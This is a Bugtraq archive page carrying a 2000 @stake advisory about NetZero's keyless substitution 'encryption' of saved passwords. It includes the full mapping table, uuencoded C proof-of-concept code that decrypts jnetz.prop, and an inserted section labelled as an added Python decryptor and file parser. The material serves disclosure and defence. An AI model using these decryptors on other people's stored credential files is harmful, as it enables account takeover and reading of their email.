Bugtraq mailing list archives
@stake Security Advisory: NetZero Password Algorithm
From: bcarrier () ATSTAKE COM (Brian Carrier)
Date: Tue, 18 Jul 2000 10:30:38 -0400
@Stake Inc.
L0pht Research Labs
www.atstake.com
www.L0pht.com

Security Advisory

Advisory Name: NetZero Password Encryption Algorithm
Release Date: 07.18.2000
Application: NetZero V3.0 and earlier
Platform: Microsoft Windows 95, 98, NT, 2000
Severity: Low. Passwords can be easily decrypted by exploiting NetZero's encryption algorithm.
Author: Brian Carrier [bcarrier () atstake com]
Vendor Status: Vendor contacted 6.19.00
Web: http://www.L0pht.com/advisories.html

Foreword:

It is unfortunately common practice that applications which let users save their passwords as a convenience rarely encrypt them, but instead opt to simply obfuscate them. This does not alter the fact that, for the majority of users at least, perception and expectation are often set incorrectly. All too often convenience wins out over security in these products. There are dozens of applications available that make this same mistake. This advisory is not an attempt to single one vendor out, but rather to continue to remind of the common problem of storing secrets and the reliance on simple obfuscation.

If effort is taken to obfuscate or hide something, then it must have been seen as valuable to someone. If not, why bother? Much the way buffer overflows abound, so do simple obfuscation mechanisms. As such, it is important to continue to bring them to light. Unfortunately it is often the case that the average user places as much trust in these as in stronger systems, through the apparent similarity in user interface.

As suggested by Aleph1, the MS CryptoAPI CryptProtectData() and CryptUnprotectData() functions currently allow applications to store secrets encrypted, based on the user's credentials. Since the methods for secure data storage already exist, they should be used by all applications to provide users with a consistent level of protection.

This advisory is designed to help people see ways of looking at, and for, these sorts of problems.
Or, even when aware of the situation, to view it as a non-problem. Teaching someone to fish rather than simply providing one meal. Enjoy the classical substitution cipher :)

Overview:

NetZero is a service that provides free Internet access to customers in exchange for permission to advertise. NetZero's users log into the network with a login and password that are saved in an ASCII text file on the user's system. This advisory addresses the weak encryption algorithm that is used to protect the password from unauthorized access.

In order for a NetZero account to be compromised, an attacker must have access to the machine or use another vulnerability to read the file. Once access is obtained, the attacker can recover the user's NetZero login and password in under a second. With the login and password in hand, the attacker can read the user's email and attack other systems under the user's identity. This is a common problem in many services of this type. One quick way to at least minimize the problem, should this risk be deemed unacceptable, is to disable the _Save Password_ option.

Detailed Description:

The login and password that are required to log into the NetZero network are stored in an ASCII file, id.dat, in the NetZero directory. If the user chooses to have the application save the password, then jnetz.prop also contains the login and password. The password in both files is encrypted using a variation of a simple substitution cipher.

The classical substitution cipher is a 1-to-1 mapping between characters where each plaintext character is replaced by one ciphertext character. For example, let P_i be the plaintext character in location 'i' and C_j be the ciphertext character in location 'j'; then C_i is the character that P_i maps to. The NetZero substitution cipher replaces each plaintext character by two ciphertext characters, but the two ciphertext characters are not stored together. When substituting character P_i of a password of length 'n', the first ciphertext character is C_i and the second character is C_(n+i). The two ciphertext characters are derived from the following table:

      |  1  a  M  Q  f  7  g  T  9  4  L  W  e  6  y  C
    --+------------------------------------------------
    g |  `  a  b  c  d  e  f  g  h  i  j  k  l  m  n  o
    T |  p  q  r  s  t  u  v  w  x  y  z  {  |  }  ~
    f |  @  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O
    7 |  P  Q  R  S  T  U  V  W  X  Y  Z  [  \  ]  ^  _
    Q |  0  1  2  3  4  5  6  7  8  9  :  ;  <  =  >  ?
    M | SP  !  "  #  $  %  &  '  (  )  *  +  ,  -  .  /

The characters inside the table represent the ASCII plaintext characters and SP represents a space. Read as ASCII codes, each row holds the sixteen characters that share one high nibble (0x60, 0x70, 0x40, 0x50, 0x30, 0x20 from top to bottom) and each column the characters that share one low nibble, so the row header encodes the high four bits of the plaintext byte and the column header the low four bits; no key is involved at any point. When encrypting a string, P, of length 'n', find each character in the table and place the column header into C_i and the row header into C_(n+i). For example:

    E(a) = ag
    E(aa) = aagg
    E(aqAQ1!) = aaaaaagTf7QM
    E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg

When decrypting a string, C, of length '2n', P_i will be the element in the above table where the column headed by C_i and the row headed by C_(n+i) intersect. For example:

    D(af) = A
    D(aaff) = AA
    D(aaMMQQfgfgfg) = AaBbCc

Temporary Solution:

Exploitation of this vulnerability is only possible once an attacker has gained access to the id.dat or jnetz.prop files. Therefore, NetZero users should not have the application save their password, and they should delete the id.dat file every time they start the application.

Vendor Response:

Vendor has acknowledged receipt of the advisory and has not provided a response as to any actions they intend to take.

Proof-of-Concept Code:

The following code will demonstrate that the password is easily decrypted. Simply uudecode, compile, and run in a directory that contains jnetz.prop.

begin 666 netzero.c
M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QS=')I;F<N:#X*"B-D969I
M;F4@54E$7U-)6D4)-C0*(V1E9FEN92!005-37T-)4$A%4E]325I%"3$R. HC
M9&5F:6YE(%!!4U-?4$Q!24Y?4TE:10DV- HC9&5F:6YE($)51E]325I%(#(U
M-@H*8V]N<W0@8VAA<B!D96-486)L95LV75LQ-ET@/2!["B @>R=@)RPG82<L
M)V(G+"=C)RPG9"<L)V4G+"=F)RPG9R<L)V@G+"=I)RPG:B<L)VLG+"=L)RPG
M;2<L)VXG+"=O)WTL"B @>R=P)RPG<2<L)W(G+"=S)RPG="<L)W4G+"=V)RPG
M=R<L)W@G+"=Y)RPG>B<L)WLG+"=\)RPG?2<L)WXG+#!]+ H@('LG0"<L)T$G
M+"=")RPG0R<L)T0G+"=%)RPG1B<L)T<G+"=()RPG22<L)THG+"=+)RPG3"<L
M)TTG+"=.)RPG3R=]+ H@('LG4"<L)U$G+"=2)RPG4R<L)U0G+"=5)RPG5B<L
M)U<G+"=8)RPG62<L)UHG+"=;)RPG7%PG+"==)RPG7B<L)U\G?2P*("![)S G
M+"<Q)RPG,B<L)S,G+"<T)RPG-2<L)S8G+"<W)RPG."<L)SDG+"<Z)RPG.R<L
M)SPG+"<])RPG/B<L)S\G?2P*("![)R G+"<A)RPG(B<L)R,G+"<D)RPG)2<L
M)R8G+"=<)R<L)R@G+"<I)RPG*B<L)RLG+"<L)RPG+2<L)RXG+"<O)WT*?3L*
M"FEN="!N>E]D96-R>7!T*&-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?
M4TE:15TL( H@(&-H87(@8U!L86EN4&%S<UM005-37U!,04E.7U-)6D5=*0I[
M"@EI;G0@<&%S<TQE;BP@:2P@:61X,2P@:61X,CL*"7!A<W-,96X@/2!S=')L
M96XH8T-I<&AE<E!A<W,I+S(["@D*"6EF("AP87-S3&5N(#X@4$%34U]03$%)
M3E]325I%*0H)>PH)"7!R:6YT9B@B17)R;W(Z(%!L86EN('1E>'0@87)R87D@
M=&]O('-M86QL7&XB*3L*"0ER971U<FX@,3L*"7T*"@EF;W(@*&D@/2 P.R!I
M(#P@<&%S<TQE;CL@:2LK*0H)>PH)"7-W:71C:"AC0VEP:&5R4&%S<UMI72D*
M"0E["@D)8V%S92 G,2<Z"@D)"6ED>#(@/2 P.R!B<F5A:SL*"0EC87-E("=A
M)SH*"0D):61X,B ](#$[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@R(#T@
M,CL@8G)E86L["@D)8V%S92 G42<Z"@D)"6ED>#(@/2 S.R!B<F5A:SL*"0EC
M87-E("=F)SH*"0D):61X,B ](#0[(&)R96%K.PH)"6-A<V4@)S<G.@H)"0EI
M9'@R(#T@-3L@8G)E86L["@D)8V%S92 G9R<Z"@D)"6ED>#(@/2 V.R!B<F5A
M:SL*"0EC87-E("=4)SH*"0D):61X,B ](#<[(&)R96%K.PH)"6-A<V4@)SDG
M.@H)"0EI9'@R(#T@.#L@8G)E86L["@D)8V%S92 G-"<Z"@D)"6ED>#(@/2 Y
M.R!B<F5A:SL*"0EC87-E("=,)SH*"0D):61X,B ](#$P.R!B<F5A:SL*"0EC
M87-E("=7)SH*"0D):61X,B ](#$Q.R!B<F5A:SL*"0EC87-E("=E)SH*"0D)
M:61X,B ](#$R.R!B<F5A:SL*"0EC87-E("<V)SH*"0D):61X,B ](#$S.R!B
M<F5A:SL*"0EC87-E("=Y)SH*"0D):61X,B ](#$T.R!B<F5A:SL*"0EC87-E
M("=#)SH*"0D):61X,B ](#$U.R!B<F5A:SL*"0ED969A=6QT.@H)"0EP<FEN
M=&8H(D5R<F]R.B!5;FMN;W=N($-I<&AE<B!497AT(&EN9&5X.B E8UQN(BP@
M8T-I<&AE<E!A<W-;:5TI.PH)"0ER971U<FX@,3L*"0D)8G)E86L["@D)?0H*
M"0ES=VET8V@H8T-I<&AE<E!A<W-;:2MP87-S3&5N72D*"0E["@D)8V%S92 G
M9R<Z"@D)"6ED>#$@/2 P.R!B<F5A:SL*"0EC87-E("=4)SH*"0D):61X,2 ]
M(#$[(&)R96%K.PH)"6-A<V4@)V8G.@H)"0EI9'@Q(#T@,CL@8G)E86L["@D)
M8V%S92 G-R<Z"@D)"6ED>#$@/2 S.R!B<F5A:SL*"0EC87-E("=1)SH*"0D)
M:61X,2 ](#0[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@Q(#T@-3L@8G)E
M86L["@D)9&5F875L=#H*"0D)<')I;G1F*")%<G)O<CH@56YK;F]W;B!#:7!H
M97(@5&5X="!3970Z("5C7&XB+" *"0D)("!C0VEP:&5R4&%S<UMI*W!A<W-,
M96Y=*3L*"0D)<F5T=7)N(#$["@D)"6)R96%K.PH)"7T*"@D)8U!L86EN4&%S
M<UMI72 ](&1E8U1A8FQE6VED>#%=6VED>#)=.PH)?0H)8U!L86EN4&%S<UMI
M72 ](# ["@H)<F5T=7)N(# ["GT*"FEN="!M86EN*'9O:60I"GL*"49)3$4@
M*FA087)A;7,["@EC:&%R(&-"=69F97);0E5&7U-)6D5=+"!C54E$6U5)1%]3
M25I%73L*"6-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?4TE:15TL(&-0
M;&%I;E!A<W-;4$%34U]03$%)3E]325I%73L*"6EN="!D;VYE(#T@,CL*"@EP
M<FEN=&8H(EQN3F5T(%IE<F\@4&%S<W=O<F0@1&5C<GEP=&]R7&XB*3L*"7!R
M:6YT9B@B0G)I86X@0V%R<FEE<B!;8F-A<G)I97) 871S=&%K92YC;VU=7&XB
M*3L*"7!R:6YT9B@B0%-T86ME($PP<&AT(%)E<V5A<F-H($QA8G-<;B(I.PH)
M<')I;G1F*")H='1P.B\O=W=W+F%T<W1A:V4N8V]M7&Y<;B(I.PH*"6EF("@H
M:%!A<F%M<R ](&9O<&5N*")J;F5T>BYP<F]P(BPB<B(I*2 ]/2!.54Q,*0H)
M>PH)"7!R:6YT9B@B56YA8FQE('1O(&9I;F0@:FYE='HN<')O<"!F:6QE7&XB
M*3L*"0ER971U<FX@,3L*"7T)"@H)=VAI;&4@*"AF9V5T<RAC0G5F9F5R+"!"
M549?4TE:12P@:%!A<F%M<RD@(3T@3E5,3"D@)B8@*&1O;F4@/B P*0D*"7L*
M"0EI9B H<W1R;F-M<"AC0G5F9F5R+" B4')O9E5)1#TB+" X*2 ]/2 P*0H)
M"7L*"0D)9&]N92TM.PH)"0ES=')N8W!Y*&-5240L(&-"=69F97(@*R X+"!5
M241?4TE:12D["@D)"7!R:6YT9B@B57-E<DE$.B E<R(L(&-5240I.PH)"7T*
M"@D):68@*'-T<FYC;7 H8T)U9F9E<BP@(E!R;V905T0](BP@."D@/3T@,"D*
M"0E["@D)"61O;F4M+3L*"0D)<W1R;F-P>2AC0VEP:&5R4&%S<RP@8T)U9F9E
M<B K(#@L(%!!4U-?0TE02$527U-)6D4I.PH)"0EP<FEN=&8H(D5N8W)Y<'1E
M9"!087-S=V]R9#H@)7,B+"!C0VEP:&5R4&%S<RD["@H)"0EI9B H;GI?9&5C
M<GEP="AC0VEP:&5R4&%S<RP@8U!L86EN4&%S<RD@(3T@,"D*"0D)"7)E='5R
M;B Q.PH)"0EE;'-E"@D)"0EP<FEN=&8H(E!L86EN(%1E>'0@4&%S<W=O<F0Z
M("5S7&XB+"!C4&QA:6Y087-S*3L*"0E]"@H)?0H*"69C;&]S92AH4&%R86US
M*3L*"@EI9B H9&]N92 ^(# I"@E["@D)<')I;G1F*"));G9A;&ED(&IN971Z
M+G!R;W @9FEL95QN(BD["@D)<F5T=7)N(#$["@E](&5L<V4@>PH)"7)E='5R
*;B P.PH)?0I]"EQN
end

bcarrier () atstake com

[ For more advisories check out http://www.l0pht.com/advisories.html ]

L-ZERO-P-H-T
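The substitution scheme described in the Detailed Description, as an added example that is not part of the advisory or of NetZero's software: a Python re-implementation of both directions of the cipher using the table's own row and column headers, plus a reader for jnetz.prop-style text. It goes one step beyond the table by treating it as what it is in ASCII terms (row header selects the high nibble of the byte, column header the low nibble) and rejects the two inputs the table cannot represent, the blank cell at row T column C (DEL) and odd-length ciphertext. The ProfUID= and ProfPWD= line prefixes are the ones the uuencoded proof-of-concept above scans for; the sample file contents, the login "jdoe", the password "Secret#42" and all function names are constructed for this example.

```python
"""NetZero two-character substitution cipher (added example, not the advisory's code)."""
import sys

# Column and row headers exactly as in the advisory's table.
COLS = "1aMQf7gT94LWe6yC"   # header of column k = plaintext bytes whose low nibble is k
ROWS = "gTf7QM"             # row headers, top to bottom
# High nibble of the plaintext bytes in each row, in the same order as ROWS
# (row g holds 0x60..0x6F, row T 0x70..0x7E, row f 0x40..0x4F, and so on).
ROW_BASE = (0x60, 0x70, 0x40, 0x50, 0x30, 0x20)


def nz_encrypt(plain: str) -> str:
    """E(P): all column headers first, then all row headers (C_i, then C_(n+i))."""
    cols, rows = [], []
    for ch in plain:
        code = ord(ch)
        # Only printable ASCII 0x20..0x7E appears in the table; DEL (0x7F) would
        # land in the blank cell at row T column C, so it is rejected too.
        if not 0x20 <= code <= 0x7E:
            raise ValueError(f"{ch!r} is not in the NetZero table")
        cols.append(COLS[code & 0x0F])
        rows.append(ROWS[ROW_BASE.index(code & 0xF0)])
    return "".join(cols) + "".join(rows)


def nz_decrypt(cipher: str) -> str:
    """D(C): pair C_i with C_(n+i) and rebuild the byte from the two headers."""
    if len(cipher) % 2:
        raise ValueError("ciphertext length must be even")
    n = len(cipher) // 2
    out = []
    for i in range(n):
        col = COLS.find(cipher[i])
        row = ROWS.find(cipher[n + i])
        if col < 0 or row < 0:
            raise ValueError(
                f"bad ciphertext pair {cipher[i]!r}/{cipher[n + i]!r} at position {i}")
        code = ROW_BASE[row] | col
        if code == 0x7F:  # the one empty cell in the table
            raise ValueError(f"ciphertext pair at position {i} has no table entry")
        out.append(chr(code))
    return "".join(out)


def parse_jnetz_prop(text: str) -> dict:
    """Recover login and password from jnetz.prop-style text.

    Mirrors what the proof-of-concept does with the file: lines beginning
    ProfUID= and ProfPWD= are matched and the remainder of the line is used.
    """
    found = {}
    for line in text.splitlines():
        if line.startswith("ProfUID="):
            found["login"] = line[len("ProfUID="):]
        elif line.startswith("ProfPWD="):
            found["cipher"] = line[len("ProfPWD="):]
            found["password"] = nz_decrypt(found["cipher"])
    return found


# Constructed sample file: the password "Secret#42" stored the NetZero way.
SAMPLE_JNETZ_PROP = "ProfUID=jdoe\nProfPWD=Q7QM7fQfM7ggTgTMQQ\n"


if __name__ == "__main__":
    # With a path argument, decode that file; otherwise decode the sample above.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="latin-1") as fh:
            text = fh.read()
    else:
        text = SAMPLE_JNETZ_PROP
    for key, value in parse_jnetz_prop(text).items():
        print(f"{key}: {value}")
```

Run it with the path of a saved jnetz.prop to decode a real file, or with no argument to decode the constructed sample. Because the row and column headers are fixed constants rather than a key, any copy of the file yields the password with one table lookup per character, which is what the advisory's "less than a second" amounts to.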
Current thread:
- Trustix Security Advisory - nfs-utils, (continued)
- Trustix Security Advisory - nfs-utils Oystein Viggen (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Andrea Costantino (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Matt Wilson (Jul 18)
- Update on TooRcon Computer Security Expo Ben (Jul 18)
- "Best Practices for Secure Web Development" whitepaper Razvan Peteanu (Jul 18)
- [Security Announce] MDKSA-2000:021 nfs-utils update Linux Mandrake Security Team (Jul 18)
- Microsoft Security Bulletin (MS00-043) Microsoft Product Security (Jul 19)
- Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability Ussr Labs (Jul 19)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Joe Laffey (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Kurt Seifried (Jul 18)
- @stake Security Advisory: NetZero Password Algorithm Brian Carrier (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Dan Kaminsky (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Damien Miller (Jul 20)
- Multiple bugs in Alibaba 2.0 Prizm (Jul 18)
- Buffer Overflow in MS Outlook Email Clients Aaron Drew (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients bednar () RAK ISTERNET SK (Jul 18)
- Re: Buffer Overflow in MS Outlook Email Clients chris.paget () ANALYSYS COM (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients Elias Levy (Jul 21)